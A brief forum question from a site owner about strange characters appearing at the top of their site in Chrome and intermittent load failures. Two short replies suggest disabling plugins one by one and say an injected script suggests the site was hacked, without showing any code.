Strange characters appear at top of site — hack attempt? [closed]

All of a sudden today, I looked on my site and there appears to be some strange characters on top:

Also, I noticed it only shows in Chrome. Is this someone trying to hack my site? Does anyone know how to fix this?

Also, sometimes when I refresh the site, I get a "webpage is not available". What is happening?

It might caused by your plugin. Just deactivate your plugin one by one, find the plugin and remove it

It looks like it got hacked. There is a script being added to the bottom of the site.
